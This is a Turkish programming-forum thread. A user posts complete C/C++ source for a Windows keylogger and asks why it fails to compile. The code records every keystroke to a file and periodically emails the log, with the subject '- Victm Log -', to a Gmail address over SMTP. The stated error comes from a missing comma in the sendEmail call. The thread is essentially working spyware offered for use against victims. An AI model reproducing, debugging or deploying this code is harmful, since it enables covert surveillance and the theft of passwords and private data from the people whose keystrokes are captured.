c++ Email yardımm !

efyasar2
29-06-2018, 03:49   |  #1  
efyasar2 avatarı
OP Taze Üye
Teşekkür Sayısı: 0
2 mesaj
Kayıt Tarihi:Kayıt: Haz 2018

#include <stdio.h>
#include <windows.h>

#define KEY_PRESSED -32767

FILE *file;

void sendEmail (char *server, char *to, char *from, char *subject, char *message);

int main(int argc, char *argv[])  {
        char key;
               
        int index;
        int length;
        char *buffer;
       
        file = fopen("Keylogger.txt", "a+");
       
        if(file != NULL) {
                while(true) {
                        Sleep(10);
                        for(key = 8; key <= 255; key++) {
                                file = fopen("Keylogger.txt", "a+");
                               
                                if(GetAsyncKeyState(key) == KEY_PRESSED) {
                                        switch(key) {
                                                case VK_SPACE:
                                                        fprintf(file, " ");
                                                        break;
                                                case VK_SHIFT:
                                                        fprintf(file, "\n[SHIFT]\n");
                                                        break;
                                                case VK_RETURN:
                                                        fprintf(file, "\n[ENTER]\n");
                                                        break;
                                                case VK_BACK:
                                                        fprintf(file, "\n[BACKSPACE]\n");
                                                        break;
                                                case VK_CAPITAL:
                                                        fprintf(file, "\n[CAPSLOCK]\n");
                                                        break;
                                                case VK_RBUTTON:
                                                        fprintf(file, "\n[RBUTTON]\n");
                                                        break;
                                                case VK_LBUTTON:
                                                        fprintf(file, "\n[LBUTTON]\n");
                                                        break;
                                                case 10:
                                                        fprintf(file, ",");
                                                    break;
                                                case 11:
                                                        fprintf(file, ".");
                                                        break;
                                               
                                                default:
                                                        fprintf(file, "%c", key);
                                                    break;
                                       
                                        }
                                } fclose(file);
                        }
                       
                    file = fopen("Keylogger.txt", "rb");
                        fseek(file, 0, SEEK_END);       
                        length = ftell(file);
                       
                        if (length >= 60) {
                                 fseek(file, 0, SEEK_SET);
                                 buffer = (char*)malloc(length);
                                 index = fread(buffer, 1, length, file);
                                 buffer[index] = '\0';
                                 sendEmail("smtp.gmail.com", "...gmail.com", "...gmail.com", "- Victm Log -" buffer);
                               
                                 fclose(file);
                                 file = fopen("Keylogger.txt", "w");
                        } fclose(file);
                }
        }

return 0;
}

void sendEmail(char *server, char *to, char *from, char *subject, char *message) {
        SOCKET sockfd;
        WSADATA wsaData;
        hostent *host;
        sockaddr_in dest;
       
        int sent;
        char line[200];
       
        if(WSAStartup(0x202, &wsaData) != SOCKET_ERROR) {
                if((host = gethostbyname(server)) != NULL) {
                        // set memory........
                        memset (&dest, 0, sizeof(dest));
                        memcpy(&(dest.sin_addr), host->h_addr, host->h_length);
                        // prepare destination.......
                       
                        dest.sin_family = host->h_addrtype;
                        dest.sin_port = htons (25);
                       
                        //get socket......
                        sockfd = socket(AF_INET, SOCK_STREAM, 0);
                       
                        //connect......
                        connect(sockfd, (struct sockaddr*)&dest, sizeof(dest));
                       
                        // send command lines.......
                    strcpy(line, "helo me.someplace.com\n");
                    sent = send(sockfd, line, strlen(line), 0);
                    Sleep(500);
                    
                    strcpy(line, "MAİL FROM:<");
                    strncat(line, from, strlen(from));
                    strncat(line, ">\n", 3);
                    sent = send(sockfd, line, strlen(line), 0);
                    Sleep(500);
                    
                    strcpy(line, "RCPT TO:<");
                    strncat(line, to,strlen(to));
                    strncat(line, ">\n", 3);
                    sent = send(sockfd, line, strlen(line), 0);
            Sleep(500);
                       
                        strcpy(line, "DATA\n");
                        sent = send(sockfd, line, strlen(line), 0);       
                        Sleep(500);
                       
                        strcpy(line, "To");
                        strcat(line, to);
                        strcat(line, "\n");
                        strcat(line, "From:");
                        strcat(line, from);
                        strcat(line, "\n");
                        strcat(line, "Subject");
                        strcat(line, subject);
                        strcat(line, "\n");
                        strcat(line, message);
                        strcat(line, "\r\n. \r\n");
                        sent = send(sockfd, line, strlen(line), 0);
                        Sleep(500);
                       
                        strcpy(line, "quit\n");
                        sent = send(sockfd, line, strlen(line), 0);
                        Sleep(500);
                }
        }
       
    //close socket and wsdata......
        closesocket(sockfd);
        WSACleanup();
       
}

--kodlarım bunlar c++ 'ta derlediğim zaman mailim yazılıyken orda bi hata buluyo 2 gündür uğraşıyorum bir türlü çözemedim nerde yanlış yaptım destek olursanız sevinirim.. Teşekkürler!

Sistem Bilgilerim
efyasar2
29-06-2018, 03:52   |  #2  
OP Taze Üye
Teşekkür Sayısı: 0
2 mesaj
Kayıt Tarihi:Kayıt: Haz 2018
0

Söylemeyi unutmuşum hata tam olarak burda buluyo :

sendEmail("gmail-smtp-in.l.google.com", "....@gmail.com", ".....@gmail.com", "- Victm Log -" buffer);